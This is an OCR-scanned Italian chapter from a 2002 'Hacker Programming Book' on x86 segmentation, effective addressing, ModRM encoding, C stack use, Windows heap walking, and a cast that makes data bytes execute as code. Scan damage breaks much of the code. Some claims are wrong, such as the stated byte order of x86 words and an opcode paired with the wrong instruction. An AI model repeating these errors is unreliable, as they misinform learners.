Una volta i registri dei processori erano al massimo 16 bits. 

Uno dei blocchi del sistema teorico visto prima era quello relativo all'address bus ovvero del 
bus indirizzi usato per comunicare quale è l'indirizzo interessato n un operazione di lettura o 
di scrittura. 

Se ad esempio la CPU desiderasse leggere un valore dalla RAM dovrebbe indicare 
l'intenzione di READ mediante un segnale sul pin di R/W tra CPU e memoria e 
successivamente dovrebbe specificare l'indirizzo interessato tramite l'address bus. 



Overlapping 
Segrnents 
of up to 
4G Bytes 
Beginning at 
Address 0 
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Questo address bus nei sistemi vecchi, prima della comparsa dei processori a 32 bits, era di 
20 bits per cui la memoria veniva utilizzata in questo modo. 

Tenete presente che anni fa i chips di memoria non contenevano certo dei Mbytes ma spesso 
non superavano i 32 Kbytes. 

Quando si disponeva di chips da 64 Kbytes per raggiungere 640 Kbytes ne erano necessari 
10. 

Elettronicamente questi erano collegati allo stesso address bus per cui senza una strategia 
particolare la segnalazione di indirizzo nnnn ad uno equivaleva a far giungere questo segnale 
a tutti i chips. 

Spero che la descrizione data vi permetta di comprendere a grandi linee le necessità che 
hanno indotto ad adottare il concetto di segmentazione. 

Chiaramente la descrizione potremmo definirla semplicistica in quanto le metodologie 

elettroniche sono sufficentemente complesse ed in continua evoluzione. 

Ad ogni modo il discorso dell' address bus a 20 bits è andato avanti per un pò di tempo. 

Per chi non avesse seguito l'evoluzione dei personal può pensare al mio caso per farsi un 

idea a riguardo dei camiamenti tecnici e finanziari. 

Pensate che il primo personal lo vidi all'univesità nel 1979 ed era un CEP 20 con basic 
incorporato. 

Quando acquistai il primo personal era il 1983 e si trattava di un PC IBM con 8088 a 4.77 
mhz, 256 kbytes (forse espanso in quanto di base mi pare fossero 64 Kbytes) di memoria e 
floppy a 360 Kbytes (costo L. 6.700.000). 
Nel 1 986 passai al 386 Wyse (L. 1 1 .200.000). 

I primi processori 386 erano bacati per cui l'address bus doveva essere ancora trattato come 
per i software a 1 6 bits. 



DEC 



4 bits 



CS 



16 bits 
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In pratica il bus a 20 bits indirizzava sull' address bus i primi 16 mediante i quali era possibile 
indirizzare 64 Kbytes. 

Dato che tutti i chip ricevevano il segnale i decoder, al quale giungevano i 4 bits pi alti, inviava 
il segnale di chip select al chip interessato. 

Il metodo funziona indipendentemente dal numero di bytes di chiascun chips in quanto, ad 
esempio, con meno bytes rimanevano pi bits da inviare sul decoder il quale poteva abilitare pi 
chip. 

Per questo motivo f utilizzato il registro di segmento in quanto 16 bits venivano utilizzati per 
indicare l'indirizzo, che poteva essere 64 kbytes, e il segmento invece indicava da quale 
indirizzo contare i 64 kbytes. 

L'indirizzo reale può essere ricavato dal seguente calcolo che utilizza i valori in esadecimale. 



sssso 

AAAA 



valore del segmento shlftato verso sinistra di 4 bits 
indirizzo offset (16 bits OxOOOO - Oxffff) 
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Con la nascita dei processori a 32 bits il discorso non era pi valido in quanto un EIP a 32 bits 
poteva indirizzare 4 miliardi di bytes senza dover usare il truscolino del segmento o 
perlomeno i segmenti non erano pi relegati alle dimensioni di 64 Kbytes. 
Una tabella più dettagliata per il calcolo dell'indirizzo è la seguente : 

8088/8086 Effective Address (EA) Calculation 

Description Clock Cycles 

Displacement 6 

Base or Index (BX, BP, SI, DI) 5 

Displacement+ (Base or Index) 9 

Base+Index (BP+DI , BX+SI) 7 

Base+Index (BP+SI, BX+DI) 8 

Base+Index+Displacement (BP+DI , BX+SI) 11 
Base+Index+Displacement (BP+SI+disp, BX+DI+disp) 12 
— add 4 cycles for word operands at odd addresses 
add 2 cycles for segment override 



Quanto segue è relativo alla teoria dell'indirizzo effettivo cosa da cercare di comprendere per 
riuscire a dimesticarsi in mezzo a tutte le tipologie di indirizzamento legate alle istruzioni 
(MOV AX, [BP+FFFFF9], ecc.). 

Fate attenzione che le informazioni legate alla tabella di codifica relativa agli indirizzi effettivi 
serve a calcolare gli op-code mostrati nella tabella delle istruzioni al termine di questo 
capitolo. 

Molti accessi vengono eseguiti nei sistemi x86 mediante la tecnica dell'indirizzamento 
effettivo. 

Ogni qualvolta che appare un indirizzamento effettivo nella lista delle istruzioni x86è possibile 
utilizzare una grossa gamma di operandi in queste istruzioni. 
Queste includono registri generali, variabili di memoria ed indici vari. 
I registri li abbiamo gi visti (EAX, AX, EH, AL ecc.) 

Le variabili di memoria possono essere a byte, word o dword e comunque anche di queste 
abbiamo gi parlato. 

La dichiarazione avviene, lo ricordo, con : 

DATA PTR DW ? 



I movimenti di dati da re per queste variabili avvengono con : 



MOV SI, DATA_PTR 
LODSW 

MOV DATA_PTR, SI 
MOV BL, ESC_CHAR 



legge DATA_PTR in SI 
fetch la word puntata da DATA_ PTR 
salva il valore incrementato da LODSW 
legge la variabile a byte ESC_CHAR 



Alternativamente è possibile usare le parentesi [] per indicare un indirizzo. 



MOV AL, [02000] ; legge il contenuto di 02000 in AL 



Spesso nei listati in esame si ha che fare con strane indicizzazioni di memoria che a volte 
nascondono strani concetti. 

Il sistema x86 supporta dei registri usati come puntatori a basi oppure come indici. 

BX e BP sono definiti base-registers. 
SI e DI sono definiti index-registers. 
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E' possibile combinare almeno un registro base, almeno iun registro d'indice e costanti come 
puntatori utilizzati a run-time per determinare l'indirizzo effettivo. 
I seguenti sono esempi di quanto detto. 

MOV AX, [BX] 
MOV CX, W[SI+1 7] 
MOV AX, [BX+BP+5] 

MOV AX, [BX] [BP] 5 ; un altro modo d scrivere la stessa istruzione 

L'indicizzazione può essere effettuata dichiarando variabili in una struttura basicizzata (?). 



STRUC 


[BP] 




; based structure 




BP_SAVE 


DW 


? 




RETADDR 


DW 


■? 




FARMI 


DW 


? 




PARM2 


DW 


? 


ENDS 









Finalmente l'indicizzazione può essere eseguita mixando componenti espliciti con altri 
dichiarati. 



TABLE 



DB 4,2,1,3,5 



Avevamo detto che il processore della famiglia x86 per lo pi (sottolineo in generale in quanto 
dal 386 in su ci sono anche altre cose) possiede quattro registri di segmento. 
Ogni registro punta a spazi di 64Kbytes. 

Quando nella programmazione eseguiamo istruzioni con riferimenti ad indirizzi possiamo 
utilizzare certe informazioni in modo diretto od indiretto. 

Ad esempio in molte istruzioni il registro di data segment viene utilizzato di default in tutte 
quelle istruzioni che fanno riferimento a dati. 

Quando il nostro programma può stare, tra codice dati e stack, in 64Kbyt.es allora tutti i 
registri CS, DS e SS possono puntare allo stesso valore. 

Chi si ricorda dell'utility fornita con le vecchie versioni del DOS, EXE2BIN, conoscer lo scopo 
di questo. 

In pratica quando un programma possedeva queste caratteristiche allora poteva essere 

trasformato in un file .COM anziché .EXE per cui dopo la compilazione e dopo il linking 

poteva essere preso da questo programma e trasformato in .COM. 

La prerogativa era appunto che il tutto doveva stare in 64Kbytes. 

Questo cambiava il modo di richiamare le funzioni e di indizzare la memoria. 

Parlando di programnmi a pi segmenti si doveva parlare di chiamate ed indirizzamenti 

intrasegmentali ed extrasegmentali. 

Chiaramente se una cali o un mov doveva avvenire dentro al segmento in cui c'era 

l'istruzione l'indirizzo di riferimento poteva essere a 16 bits mentre se ci si riferiva all'esterno 

questo doveva essere a 32 bits ovvero composto da SEGMENTO:OFFSET. 

In effetti nelle istruzioni intrasegmentali i regsitri di segmento venivano usati di default. 

Facciamo un esempio supponendo di voler muovere in AL il valore in memoria puntato da 

BX. 



MOV AL, [BX] 

In questo caso il registro DS viene usato di default per comprendere a quale segmento DX 
punta. 

Se si desidera trattare BX nel code segment si deve codificare : 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



Fate attenzione che questo metodo viene indicato come segment ovverride e che funziona 
SOLO con l'istruzione successiva. 

Se si avesse CS che punta ad un segmento e DS ad un altro la sequenza : 
cs 

MOV AL, [BX] 
MOV AH, [BX] 

muoverebbe in AH e AL due valori differenti (probabile) o perlomeno derivanti da due indirizi 
diversi. 

Esistono in macroassembler direttive (ASSUME ecc.) che agiscono sui segmenti, ma come 
ho detto prima nei disassemblati non compaiono. 

Ricordatevi anche che tutte le istruzioni permettono indirizzi effettivi comre operandi. 

Ogni istruzione con un indirizzo effettivo ha un encode byte conosciuto come effective 

address byte seguito da un op-code di 1 byte per l'istruzione. 

Per motivi oscuri l'intel chiama questo byte ModRM byte. 

Se l'indirizzo effettivo è una variabile di memoria o un locazione di memoria indicizzata con 
un valore di offset costante diverso da 0 allora il byte dell'indirizzo effettivo sarà 
immediatamente seguito dall'ammontare dell'offset. 

Quest'ammontare nel range tra -128 e +127 è rappresentato da un singolo byte con segno 
contrassegnato da D( nella tabella seguente. 

L'ammontare che richiede 1 6bits come qantit di memoria è contrassegnato da D1 6. 

Come tutte le quantità a 16 bits nella famiglia x86 la WORD è salvata con il byte pi 

significativo prima. 

La seguente tabella è organizzata in 32 righe da 8 colonne e rappresentano i possibili valori 
per un operando relativo ad un indirizzo effettivo : 8 egistri e 24 modi di indicizzazione della 
memoria. 

Un venticinquesimo modo, [BP] con zero come spiazzamento, è sato pre-riempito da una 
semplice variabile di memoria. 

Se dovete codificare [BP] con nessun spiazzamento dovete prendere [BP]+D8 con il valore di 
D8 a zero. 

Le 8 colonne della tabella riflettono informazioni relative al byte dell'indirizzo effettivo. 
Normalmente questa è l'identità di altri operandi (sempre registri) di istruzioni a 2 operandi. 
Queste istruzioni sono identificate da un 7r" seguito dal codic4e operativo. 
Alcune volte le informazioni passate pretendono un supplemento per l'identificazione delle 
stesse istruzioni. 

Per esempio supponiamo di voler conoscere precisamente i bytes della codifica 
dell'istruzione SUB B[BX+17],100. 

Questa istruzione sottrae una quantità (100) da un indirizzo effettivo (B[BX+17]). 

Consultante la lista delle istruzioni si trova la forma generale SUB eb,ib (cercate le istruzioni 

nella lista alla fine del capitolo). 

80 /5 ib SUB eb, ib Subtract immediate byte front EA byte 

L' opeode è 80 15 ib. 

Il /5 denota un byte d'indirizzo effettivo il cui valore viene preso dalla colonna 5 della seguente 
tabella. 

L'offset 17 decimale (11 hex) si adatta a un singolo byte D8 il quale prende il valore dalla riga 
"[BX] + D8". 

La tabella ci dice che l'indirizzo effettivo è 6F. 
Immediatamente dopo 6F c'è l'offset (1 1 hex). 

Coniderando che il valore ib-value è 100 (64 hex) allora l'istruzione SUB B[BX+17], 100 è 80 
6F 1 1 64. 

Ripeto qnto avevo gi accennato all'inizio del capitolo. 

La lista da utilizzare combinata alla seguente tabella è quella riportata al termine di questa 
sezione. 



s = 


ES 


CS 


SS 


DS 










rb = 


AL 


CL 


DL 


BL 


AH 


CH 


DH 


BH 




AX 


ex 


DX 


BX 


SP 


BP 


SI 


DI 
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dig±t= 


0 


1 


2 


3 


4 


5 


6 


7 
























Effective 


EA byte 


















address : 


values: 


00 


08 


10 


18 


20 


28 


30 


38 


[BX + 


SI] 




01 


09 


11 


19 


21 


29 


31 


39 


[BX + DI] 




02 


OA 


12 


1A 


22 


2A 


32 


3A 


[BP + 


SI] 




03 


OB 


13 


1B 


23 


2B 


33 


3B 


[BP + 


DI] 




04 


OC 


14 


1C 


24 


2C 


34 


3C 


[SI] 






05 


OD 


15 


1D 


25 


2D 


35 


3D 


[DI] 






06 


OE 


16 


1E 


26 


2E 


36 


3E 


D16 (simple var) 




07 


OF 


17 


1F 


27 


2F 


37 


3F 


[BX] 






40 


48 


50 


58 


60 


68 


70 


78 


[BX + 


SI] + D8 




41 


49 


51 


59 


61 


69 


71 


79 


[BX + 


DI] + D8 




42 


4A 


52 


5A 


62 


6A 


72 


7A 


[BP + 


SI] + D8 




43 


4B 


53 


5B 


63 


6B 


73 


7B 


[BP + 


DI] + D8 




44 


4C 


54 


5C 


64 


6C 


74 


7C 


[SI] + D8 




45 


4D 


55 


5D 


65 


6D 


75 


7D 


[DI] + D8 




46 


4E 


56 


5E 


66 


6E 


76 


7E 


[BP] 1 


D8 




47 


4F 


57 


5F 


67 


6F 


77 


7F 


[BX] + D8 




80 


88 


90 


98 


AO 


A8 


BO 


B8 


[BX + 


SI] + DI 6 




81 


89 


91 


99 


Al 


A9 


Bl 


B9 


[BX + 


DI] + DI 6 




82 


8A 


92 


9A 


A2 


AA 


B2 


BA 


[BP + 


SI] + D16 




83 


8B 


93 


9B 


A3 


AB 


B3 


BB 


[BP + 


DI] + D16 




84 


8C 


94 


9C 


A4 


AC 


B4 


BC 


[SI] + DI 6 




85 


8D 


95 


9D 


A5 


AD 


B5 


BD 


[DI] + DI 6 




86 


8E 


96 


9E 


A6 


AE 


B6 


BE 


[BP] + DI 6 




87 


8F 


97 


9F 


A7 


AF 


B7 


BF 


[BX] + DI 6 




CO 


C8 


DO 


D8 


EO 


E8 


FO 


F8 


ew=AX 


eb=AL 




CI 


C9 


DI 


D9 


El 


E9 


FI 


F9 


ew=CX 


eb=CL 




C2 


CA 


D2 


DA 


E2 


EA 


F2 


FA 


ew=DX 


eb=DL 




C3 


CB 


D3 


DB 


E3 


EB 


F3 


FB 


ew=BX 


eb=BL 




C4 


ce 


D4 


DC 


E4 


EC 


F4 


FC 


ew=SP 


eb=AH 




C5 


CD 


D5 


DD 


E5 


ED 


F5 


FD 


ew=BP 


eb=CH 




C6 


CE 


D6 


DE 


E6 


EE 


F6 


FE 


ew=SI 


eb=DH 




C7 


CF 


D7 


DF 


E7 


EF 


F7 


FF 


ew=DI 


eb=BH 



D8 denotes an 8-blt displacement following the EA byte, 
to be sign-extended and added to the index. 



D16 denotes a 16— bit displacement following the EA byte, 
to be added to the index. 

Default segment register is SS for effective addresses containing 
a BP index; DS for other memory effective addresses . 

Ritorniamo al discorso della segmentazione che facevamo prima di questa parte legata agli 
indirizzi effettivi. 

Chiaramente fattori di compatibilità con i software vecchi ha obbligato a mantenere questo 
metodo dei segmenti attivo per cui ancora oggi troviamo spesso gli indirizzi specificati con 

segmento : offset 

La visione legata all'uso dei vari segmenti è sicuramente maggiore nei programmatori che 
vengono dal Linguaggio C dato che in quasi tutti gli altri linguaggi la visione di questi è 
trasparente. 

Il programmatore in C, ad esempio, sa bene che le variabili dichiarate localmente ad una 
funzione, senza specificatori di classi di memoria particolari, vengono allocate dentro al 
segmento di stack per cui è sempre cura del programmatore allocare, mediante specifici 
flags del compilatore, le dimensioni adatte di questo. 

Nel C si deve anche sapere che le variabili globali vengono definite dentro al segmento dati 
proprie del modulo in cui compaiono, senza contare che spesso si deve dimesticare in mezzo 
ai vari #pragma che influiscono sui nomi e sulle tipologie dei segmenti. 
Un programma generalmente è costituito da codice e da dati. 

Ogni istruzione del processore dispone di codice di operazione che definisce anche le 
dimensioni dell'operazione stessa e dei suoi operandi. 

Il codice normalmente è ubicato in un o specifico segmento che prende appunto il nome da 
questo ovvero possiede il nome di code segment. 

I dati usati dal programma possono essere allocati dentro ai segmenti dati oppure dentro al 
segmento di stack. 
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Mentre altri linguaggi possiedono una visione ferrea di questi concetti, anzi quasi sempre li 
rendono trasparenti all'utente, il linguaggio C obbliga il programmatore a tenere gli occhi 
aperti. 

Spesso erano comuni errori in esecuzione del tipo 'Stack overflow'. 

Se si andava a vedere bene il tutto ci si accorgeva che magari il compilatore di default 
allocava 4096 bytes per il segmento di stack. 
Andando ad analizzare il codice si trovava in un punto : 

void functlon () 
{ 

int a [51 92]; 

Il programma allocava nello stack 5192 * dimensione_int bytes nello stack e quindi ... 'Stack 
overflow'. 

Allora la soluzione era quella di chiedere al compilatore di ridimensionare lo stack. 

In assembler la definizione dei segmenti avviene con la specifica di SEGMENT ed 

eventualmente è anche possibile stabilire l'origine. 

Con il programmino che segue è possibile visualizzare i dati di stack. 

#define STACKLOW 1 

int *stacktop, *ip; 

void main(int argc, char *argv[]) 
{ 

stacktop = (int *) Sargv; 

printf ("Sargc=%081x &argv=%081x\n" , Sarge, Sargv); 
printf ("Smain=%081x &f=%081x &g=%081x\n" , main, f, g) ; 
f (0x11112222, 0x33334444) ; 

ì 

int f (int arg_l, int arg_2) 
{ 

g (0x55556666) ; 

ì 

int g(int arg_2) 
{ 

int locai; 

locai = 0x77778888; 
#ifdef STACKLOW /* Stack grows towards LOWER addresses */ 

for (ip = stacktop; ip >= Slocai; ip — ) 
#else /* Stack grows towards HIGHER addresses*/ 

for (ip = stacktop; ip <= Slocai; ip++) 
tendi f 

printf ("%081x\t%08x\n", ip, *ip) ; 



La seguente è la definizione di un segmento dati con origine a 2000. 

DATA SEGMENT 
ORG 02000 

(qui ci vanno le dichiarazioni dei vostri dati) 
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DATA ENDS 



Il seguente listato mostra come è possibile ricavare informazioni relative al segmento dati di 
un programma in esecuzione. 

iinclude <afxwin.h> 
iinclude <afxext.h> 
iinclude <dos.h> 
iinclude "resourc2 .h" 

typedef struct tagDEFAULTDATASEGMENT 
{ 



HANDLE hinstActive; 


// 


instance handle 


of active app 


HWND 


hwndActive ; 


// 


window handle 


of active app 


WORD 


wSize, 


// 


size 


(bytes) 


of 


Data Segment . 




wStatlcData, 


// 


size 


(bytes) 


of 


static data. 




wStackMax, 


// 


size 


(bytes) 


of 


stack size defined in .DEF 




wStackUsed, 


// 


size 


(bytes) 


of 


stack actually used. 




wHeapMoveable , 


// 


size 


(bytes) 


of 


heap allocation (moveable) . 




wHeapFixed, 


// 


size 


(bytes) 


of 


heap allocation (fixed) . 




wHeapFree, 


// 


size 


(bytes) 


of 


free space in heap. 




wOther, 


// 


size 


(bytes) 


of 


remaining allocated space in DS 




wUnused; 


// 


size 


(bytes) 


of 


heap unused. 



} DEFAULTDATASEGMENT; 
static DEFAULTDATASEGMENT DDS ; 



void CMainDlgWindow : :dds_walk () 
{ 

/* Originai Code by: Chiverton Graphics, Inc. 1991 

Modified by Todd Osborne January 1994 to MFC 2.0 C++ 
application with new features . CompuServe ID: 71431,2243 

*/ 

static DEFAULTDATASEGMENT OldDDS; 

WORD wRecordSize, // size in bytes of heap record. 

wStatus; // type of heap record. 

LPSTR lplnstance, // far pointer to Default Data Segment. 

lpHeapRecord, // far pointer to heap record. 

IpNextHeapRecord; // far pointer to next heap record. 

idefine PREV_POINTER (* (WORD FAR*) lpHeapRecord) // Backward "pointer" 

idefine NEXT_POINTER (* (WORD FAR*) (lpHeapRecord+2) ) // Forward "pointer" 

#define PSTACKBOTTOM (*(WORD FAR*) (lplnstance+14) ) 

#define PSTACKMIN (* (WORD FAR*) (lplnstance+12) ) 

idefine PSTACKTOP (* (WORD FAR*) (lplnstance+10) ) 

idefine PLOCALHEAP (* (WORD FAR*) (lplnstance+ 6)) 

// First, initialize the data segment values . 

DDS.wSize = 0; 

DDS.wStaticData = 0; 

DDS . wStackMax = 0; 

DDS . wStackUsed = 0; 

DDS . wHeapMoveable = 0; 

DDS . wHeapFixed = 0; 

DDS . wHeapFree = 0; 

DDS.wOther = 0; 

DDS.wUnused = 0; 

// Now, get the window that has the focus. 
DDS . hwndActive = : : GetActiveWindow () ; 

// Is it a valid window? 

if ( HsWindow (DDS . hwndActive) ) return; 

// If this is a different window than before, get a new instance handle. 
if (DDS. hwndActive != OldDDS . hwndActive) 
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if ( !DDS . hinstActive) return; 
} 

// Lock down the Data Segment 

if ( ! (lplnstance = (LPSTR) GlobalLock (DDS . hinstActive) ) ) return; 
/* 

* The Data Segment is a global memory object - createci by WINDOWS 

* with a GlobalAlloc. It ' s comprised of 4 components : header, 

* Static, stack, and locai heap. Ali 4 components are offset 

* into the segment, with the header at DS:0000. 
* 

* 

* The header occupies the first 16 bytes of a Default Data Segment. 

* Within the Header area are 3 pointers to the stack: 
* 

* pStackBottom - (highest physical address) beginning of stack. 

* pStackMin — High— Water mark of actual stack use. 

* pStackTop - (lowest physical address) end of stack. 
* 

* Remember, the stack grows "down" (higher to lower address) , so 

* to compute the stack sizes, we use these equations : 
* 

* wStackMax = pStackBottom - pStackTop ; 

* wStackUsed = pStackBottom — pStackMin ; 
* 

* 

*/ 

DDS . wStackMax = PSTACKBOTTOM - PSTACKTOP ; 
DDS . wStackUsed = PSTACKBOTTOM - PSTACKMIN ; 
DDS.wStaticData = PSTACKTOP ; 

// First test for a heap. (It's possible there isn't one.) 
if (PLOCALHEAP == 0) 
{ 

GlobalUnlock (DDS . hinstActive) ; 
return; 

} 

/* 

* The heap begins where the 

* stack ends . The offset that represents the 

* beginning of the heap is stored in the header area, 6 bytes from 

* DS-.OOOO. Actually, the heap begins 4 bytes before this offset. 
* 

* Now we ' 11 get a far pointer (lpHeapRecord) to the lst record in the heap. 
* 

*/ 

lpHeapRecord = lplnstance + PLOCALHEAP - 4; 



/* 

* Traverse the locai heap. The heap is implemented as a doubly-linked 

* list. The lst WORD is a backward "pointer" (ie, offset) to the 

* previous record. The 2nd WORD is the forward pointer to the next record. 

* When the forward pointer points to itself we are done. 



DDS.wSize = (WORD) GlobalSize (DDS . hinstActive) ; 

while (FP_OFF (lpHeapRecord) < DDS.wSize) 
{ 

IpNextHeapRecord = (lplnstance + NEXT_POINTER) ; 
if (IpNextHeapRecord == lpHeapRecord) break; 
wRecordSize = IpNextHeapRecord — lpHeapRecord; //includes ptr overhead 
wStatus = (PREV_POINTER & 0x0003); 



switch (wStatus) 
{ 

case 0: DDS . wHeapFree 
case 1: DDS . wHeapFixed 
case 3: DDS . wHeapMoveable 



+= wRecordSize; break; 
+= wRecordSize ; break; 
+= wRecordSize ; break; 



lpHeapRecord = IpNextHeapRecord; 
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/* 

* At this point, heap traversai is done. 

* However, the heap can grow until the size of DS is 64K (OxFFFF) . 

* Determine how many additional bytes the heap can grow. 
*/ 

DDS.wUnused = OxFFFF - DDS .wSize; 



// Anything else we didn't account fori 
DDS.wOther = DDS .wSize - DDS.wStaticData 

- DDS . wStackMax 

- DDS . wHeapFixed 

- DDS . wHeapFree 

- DDS . wHeapMoveable ; 



GlobalUnlock (DDS .hinstActive) ; 



// If anything has che 
if (DDS.hwndActive l- 
DDS . wHeapFree ! - 

DDS . wHeapFixed ! - 
DDS . wHeapMoveable !- 
DDS.wOther ! = 

DDS.wSize !- 
DDS . wStackOsed ! = 
{ 

// Update Dialog Box 
char sz[80]; 



xiged since last walk, 
OldDDS . hwndActive 
OldDDS . wHeapFree 
OldDDS . wHeapFixed 
OldDDS. wHeapMoveable 
OldDDS . wOther 
OldDDS. wSize 
OldDDS . wStackUsed) 

Values 



update client window. 



// Get Active Window Title 
char Title [80]; 

: : GetWindowText (DDS.hwndActive, Title, 80); 
sprintffsz, "Watching: %s", Title); 
SetDlgltemText ( LBL_ WATCHING, sz) ; 

// Fili in Memory Information 
sprintf (sz, "%u", DDS.wSize) ; 
SetDlgltemText (LBL_DATAO, sz) ; 

sprintf (sz, "%u", DDS.wStaticData); 
SetDlgltemText (LBL_DATA1, sz) ; 

sprintf (sz, "%u", DDS . wStackMax) ; 
SetDlgltemText (LBL DATA2, sz) ; 

sprintf (sz, "%u ", DDS . wStackUsed) ; 
SetDlgltemText (LBL_DATA3, sz) ; 

sprintf (sz, "%u ", DDS . wHeapMoveable) ; 
SetDlgltemText (LBL_DATA4 , sz) ; 

sprintf (sz, "%u", DDS . wHeapFixed) ; 
SetDlgltemText (LBL_DATA5, sz) ; 



sprintf (sz, "%u", DDS . wHeapFree) ; 
SetDlgltemText (LBL_DATA6, sz) ; 

sprintf (sz, "%u", DDS.wOther); 
SetDlgltemText (LBL_DATA7, sz) ; 

sprintf (sz, "%u", DDS.wUnused); 
SetDlgltemText (LBL_DATA8, sz) ; 

sprintf (sz, "%.3f", m_nTiming) ; 
SetDlgltemText (LBL_DATA9, sz) ; 



OldDDS = DDS; 
} 



Il C comunque permette di vedere come di fatto è un super assembler. 
Guardate il seguente esempio e capirete il perchè. 

Dicevo prima che il codice viene allocato normalmente in un segmento di codice mentre le 
dichiarazioni globali in un segmento dati. 
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Se prendiamo il debugger ed andiamo a vedere come sono salvate le nostre istruzioni 
vediamo che sono delle lunghe sequenze di numeri che noi possiamo visualizzare in binario, 
esadecimale o qualsiasi base numerica che vogliamo. 
Quindi un codice del tipo : 



mov ecx, eax 




and ecx, 000003 




ecc. 




potremmo vederlo in esadecimale come 


8CC8 mov ecx, aax 




83E13 and ecx, 000003 





Il Linguaggio C possiede il concetto di CAST ovvero di forzatura il quale permette di far 
vedere al linguaggio delle tipologie diverse come se di fatto fossero altri tipi e quindi con 
propriet aritmetiche differenti dall'originale. 

Prendiamo i numeri relativi al codice assembler di una funzione e inseriamoli come elementi 
di un array di unsigned char (1 byte). 



unsigned char codex[] = { 0x8C, 0xC8, 0x83, OxEl, 0x13 } ; 
A questo punto dichiariamo un puntatore ad una funzione. 

Un puntatore ad una funzione è lo spazio sufficiente a mantenere memorizzato l'indirizzo di 
una funzione. 

void (*function) () ; 

Se a questo punto invece di assegnargli l'indirizzo di una funzione eseguiamo il CAST 
imbrogliandolo e facendogli credere che l'indirizzo dell'array di unsigned char sia di fatto 
l'indirizzo di una funzione avremo che richiamando il puntatore a funzione il sistema eseguirà 
i numeri contenuti nell'array come se di fatto fossero codice binario. 



Bello non è vero ! 

Il programmino in C sarebbe : 

int a[] = { 12,23, 34,56, 78 } ; 

void (*func) () = (void (*)()) &a[0] ; 

void main (void) 
< 

(*func) (); 

ì 



Tanto per non perdere l'occhio guardate il tutto tradotto in assembler dal compilatore. 



title test2.c 
.386P 

include listing.inc 
if QVersion gt 510 
.model FLAT 
else 

_TEXT SEGMENT PARA USE32 PUBLIC 'CODE' 
TEXT ENDS 

_DATA SEGMENT DWORD USE32 PUBLIC 'DATA ' 
_DATA ENDS 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



CONST ENDS 

BSS SEGMENT DWORD USE32 PUBLIC 'BSS' 
_BSS ENDS 

TLS SEGMENT DWORD USE32 PUBLIC ' TLS ' 
_TLS ENDS 

FLAT GROUP _DATA, CONST, _BSS 

ASSUME CS: FLAT, DS : FLAT, SS: FLAT 

endlf 

PUBLIC _a 
PUBLIC _func 
_DATA SEGMENT 
_a DD OcH 
017H 
022H 
038H 
04eH 
FLAT :_a 



DD 
DD 
DD 
DD 

_func DD 
_DATA ENDS 
PUBLIC _main 

TEXT SEGMENT 
_main PROC NEAR 
; File test2.c 
; Line 10 

push ebp 

mov ebp, esp 
; Line 11 

cali DWORD PTR _func 
; Line 12 

pop ebp 

ret 0 
_main ENDP 
TEXT ENDS 



Come potete vedere la cali salta esattamente dove ci sono gli interi. 

ATTENZIONE A NON ESEGUIRE IL CODICE DATO CHE GLI INTERI NON 



Facciamo saltare il sistema ad eseguire del codice dentro al data segment. 
Vediamo ora lo scopo dei registri. 

EAX e EDX sono registri a scopo generale che possono essere utilizzati per diversi motivi. 

ECX è anche lui a scopo generale. Diventa specializzato quando viene utilizzato in fasi di 
conteggio. 

EBX è sempre general purpose anche se spesso viene utilizzato per creare indirizzi di 
dispiazzamento. 

Come dicevo prima i registri da EAX a EDX possono essere visti come registri a 32, 16 
oppure a 8 bits. 
Ad esempio : 



32 16 8 8 

EAX AX AH AL [EAX [AX [AH] [AL] ] ] 

EBX BX BH BL [EBX [BX [BH] [BL] ] ] 
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EDX DX 



DH 



DL 



[ EDX [DX [DH ] [DL] ] ] 



ESI ed EDI sono usati spesso come registri d'indice oppure vengono spesso usati per 
puntare a stringhe. 

ESP ed EBP sono usati per gestire lo stack. 

Una volta lo stack era fisso nei processori (preistoria). 

Successivamente vennero inseriti dei registri per puntare alla base ed alla testa dello stack. 
Esistono inoltre quattro registri di segmento e precisamente quelli del CODE SEGMENT, 
DATA SEGMENT, STACK SEGMENT ed EXTRA SEGMENT.Questi sono CS, DS, ES, 
GS, FS ed SS. 

Un registro particolare è quello che mantiene l'indirizzo dell'istruzione in esecuzione e 
precisamente EIP. 

Nel processore esiste anche un registro dei flags che indicano certi stati della CPU stessa. 
Gli indirizzi delle stringhe usate nei programmi vengono spesso inseriti nei registri per cui 
risulta spesso importante avere una panoramica dei valori a cui puntano i registri. 
Spesso gli indirizzi delle stringhe o dei valori sono inseriti ad indirizzi calcolati con : 



[EDX + 10] 

oppure 
[ECX - 2] 

Per questo motivo alcuni disassemblatori possiedono finestre in cui mostrano in 
continuazione questi valori mentre altri permettono di richiederne la visualizzazione con 
appositi comandi. 

La seguente finestra è di WDASM 8.9 e devo ammettere che è veramente ottima come 
quantità di dati mostrati. 

I noltre permette di cambiare il formato dei dati (DWORD, WORD, BYTE 
ecc.) 

I vari valori relativi a [EAX- 10] ecc. sono mostrati nella finestra centrale. 

E' possibile cambiare il registro premendo il pulsante sul lato sinistro della lista di scorrimento. 



Eiy.BFF99EDF tt in Mudule. KE Fi N E L32.DLL 




Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



I pulsanti sul lato in basso permettono invece di fare quanto appena detto, ovvero di cambiare 
il formato di visualizzazione. 

La visione dei registri deve essere anche contemplata nell'istante in cui si analizzano le 
istruzione dell'assembler 80xx. 

Un registro particolare è quello dei flags il quale serve a segnalare eventi particolari. 
Lo scopo di ogni singolo flag è riportato in una tabella nella pagina successiva. 

II linguaggio C dispone della specifica _ASM (ogni compilatore possiede la sua) che permette 
di scrivere del codice in assembler. 

Queste istruzioni possono essere riassunte utilizzando una matrice in cui sono raggruppate in 
due gruppi e precisamente istruzioni con un solo operando o con due. 
Le istruzioni sono registro a registro, registro a memoria, memoria a registro oppure possono 
influire su registri d'indice. 

Parlando di registri ricordiamoci che i processori della classe 386 possiedono una serie di 
quattro registri di breakpoint che permette ai debugger di gestire tali funzionalità. 
Dicevamo prima di una matrice che può mostrare i tipi di istruzioni: 



DUE OPERANDI 
R <— M 
M <— R 
R <- R 
RjM <- I 
RjM <- S * 
S <- RjM * 



UN OPERANDO 

R 

M 

S * 



• Solamente istruzioni movimento dati (MOV, PUSH, POP) 
S Registri di segmento (CS, DS, ES, SS) 

R Registri ordinari EAX, EBX, ecc.) 
M Uno degli indirizzi seguenti 

• Indirizzo puro 

• [BX]+offset 

• [BP]+offset 
qualsiasi di questi indicizzati da SI 



